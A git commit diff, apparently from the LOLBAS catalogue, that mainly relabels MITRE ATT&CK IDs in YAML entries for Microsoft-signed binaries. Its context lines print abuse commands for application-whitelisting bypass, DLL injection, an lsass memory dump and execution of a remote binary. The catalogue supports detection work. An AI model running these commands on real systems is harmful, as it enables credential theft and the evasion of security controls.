More changes (mainly changing generic T1218 to dev-specific T1127)

This commit is contained in:
Wietze 2021-11-05 20:06:57 +00:00
parent 8286677dac
commit 2577066af9
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
19 changed files with 32 additions and 34 deletions

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
Category: AWL Bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Full_Path: Full_Path:
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Defense evasion Usecase: Defense evasion
Category: ADS Category: ADS
Privileges: Admin Privileges: Admin
MitreID: T1562 MitreID: T1562.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\fltMC.exe - Path: C:\Windows\System32\fltMC.exe

View File

@ -9,37 +9,35 @@ Commands:
Usecase: Compile and run code Usecase: Compile and run code
Category: AWL bypass Category: AWL bypass
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msbuild.exe project.csproj - Command: msbuild.exe project.csproj
Description: Build and execute a C# project stored in the target csproj file. Description: Build and execute a C# project stored in the target csproj file.
Usecase: Compile and run code Usecase: Compile and run code
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msbuild.exe @sample.rsp - Command: msbuild.exe @sample.rsp
Description: Executes Logger statements from rsp file Description: Executes Logger statements from rsp file
Usecase: Execute DLL Usecase: Execute DLL
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127.001
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
Description: Executes generated Logger dll file with TargetLogger export Description: Executes generated Logger dll file with TargetLogger export
Usecase: Execute DLL Usecase: Execute DLL
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127.001
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msbuild.exe project.proj - Command: msbuild.exe project.proj
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
Usecase: Execute project file that contains XslTransformation tag parameters Usecase: Execute project file that contains XslTransformation tag parameters
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe

View File

@ -9,14 +9,14 @@ Commands:
Usecase: Spawn process using other binary Usecase: Spawn process using other binary
Category: Execute Category: Execute
Privileges: Administrator Privileges: Administrator
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows 10 2004 OperatingSystem: Windows 10 2004
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary Usecase: Spawn process using other binary
Category: Execute Category: Execute
Privileges: Administrator Privileges: Administrator
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows 10 1909 OperatingSystem: Windows 10 1909
Full_Path: Full_Path:
- Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\System32\ttdinject.exe

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Spawn process using other binary Usecase: Spawn process using other binary
Category: Execute Category: Execute
Privileges: Administrator Privileges: Administrator
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows 10 1809 and newer OperatingSystem: Windows 10 1809 and newer
- Command: TTTracer.exe -dumpFull -attach pid - Command: TTTracer.exe -dumpFull -attach pid
Description: Dumps process using tttracer.exe. Requires administrator privileges Description: Dumps process using tttracer.exe. Requires administrator privileges

View File

@ -2,7 +2,7 @@
Name: adplus.exe Name: adplus.exe
Description: Debugging tool included with Windows Debugging Tools Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x Author: mr.d0x
Created: 1/9/2021 Created: 2021-09-01
Commands: Commands:
- Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
Description: Creates a memory dump of the lsass process Description: Creates a memory dump of the lsass process

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Local execution of assembly shellcode. Usecase: Local execution of assembly shellcode.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
- Command: | - Command: |
cdb.exe -pd -pn <process_name> cdb.exe -pd -pn <process_name>
@ -18,7 +18,7 @@ Commands:
Usecase: Run a shell command under a trusted Microsoft signed binary Usecase: Run a shell command under a trusted Microsoft signed binary
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Local execution of unsigned C# code. Usecase: Local execution of unsigned C# code.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Full_Path: Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe

View File

@ -9,14 +9,14 @@ Commands:
Usecase: Execute any binary with given arguments and it will call developertoolssvc.exe. developertoolssvc is actually executing the binary. https://i.imgur.com/Go7rc0I.png Usecase: Execute any binary with given arguments and it will call developertoolssvc.exe. developertoolssvc is actually executing the binary. https://i.imgur.com/Go7rc0I.png
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows 7 and up with VS/VScode installed OperatingSystem: Windows 7 and up with VS/VScode installed
- Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
Description: The above binary will execute other binary. Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments. Usecase: Execute any binary with given arguments.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows 7 and up with VS/VScode installed OperatingSystem: Windows 7 and up with VS/VScode installed
Full_Path: Full_Path:
- Path: 'c:\windows\system32\devtoolslauncher.exe' - Path: 'c:\windows\system32\devtoolslauncher.exe'

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Local execution of C# project stored in consoleapp folder. Usecase: Local execution of C# project stored in consoleapp folder.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Full_Path: Full_Path:
- Path: N/A - Path: N/A

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Local execution of a process as a subprocess of Dxcap.exe Usecase: Local execution of a process as a subprocess of Dxcap.exe
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Full_Path: Full_Path:
- Path: C:\Windows\System32\dxcap.exe - Path: C:\Windows\System32\dxcap.exe

View File

@ -9,14 +9,14 @@ Commands:
Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe. Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
- Command: Mftrace.exe powershell.exe - Command: Mftrace.exe powershell.exe
Description: Launch cmd.exe as a subprocess of Mftrace.exe. Description: Launch cmd.exe as a subprocess of Mftrace.exe.
Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe. Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86

View File

@ -1,6 +1,6 @@
--- ---
Name: ntdsutil.exe Name: ntdsutil.exe
Description: Command line utility used to export Actove Directory. Description: Command line utility used to export Active Directory.
Author: 'Tony Lambert' Author: 'Tony Lambert'
Created: 2020-01-10 Created: 2020-01-10
Commands: Commands:

View File

@ -9,14 +9,14 @@ Commands:
Usecase: Local execution of arbitrary C# code stored in local CSX file. Usecase: Local execution of arbitrary C# code stored in local CSX file.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
- Command: rcsi.exe bypass.csx - Command: rcsi.exe bypass.csx
Description: Use embedded C# within the csx script to execute the code. Description: Use embedded C# within the csx script to execute the code.
Usecase: Local execution of arbitrary C# code stored in local CSX file. Usecase: Local execution of arbitrary C# code stored in local CSX file.
Category: AWL Bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Full_Path: Full_Path:
- Path: - Path:

View File

@ -9,21 +9,21 @@ Commands:
Usecase: Executes a process under a trusted Microsoft signed binary Usecase: Executes a process under a trusted Microsoft signed binary
Category: AWL Bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: OperatingSystem:
- Command: Remote.exe /s "powershell.exe" anythinghere - Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe Description: Spawns powershell as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: OperatingSystem:
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
Description: Run a remote file Description: Run a remote file
Usecase: Executing a remote binary without saving file to disk Usecase: Executing a remote binary without saving file to disk
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: OperatingSystem:
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Execute Visual Basic script stored in local Windows Script Component file. Usecase: Execute Visual Basic script stored in local Windows Script Component file.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Full_Path: Full_Path:
- Path: - Path:

View File

@ -9,14 +9,14 @@ Commands:
Usecase: Injection of locally stored DLL file into target process. Usecase: Injection of locally stored DLL file into target process.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
Usecase: Injection of locally stored DLL file into target process. Usecase: Injection of locally stored DLL file into target process.
Category: AWL Bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Full_Path: Full_Path:
- Path: - Path:

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe. Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Full_Path: Full_Path:
- Path: c:\windows\system32\vsjitdebugger.exe - Path: c:\windows\system32\vsjitdebugger.exe

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1127
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe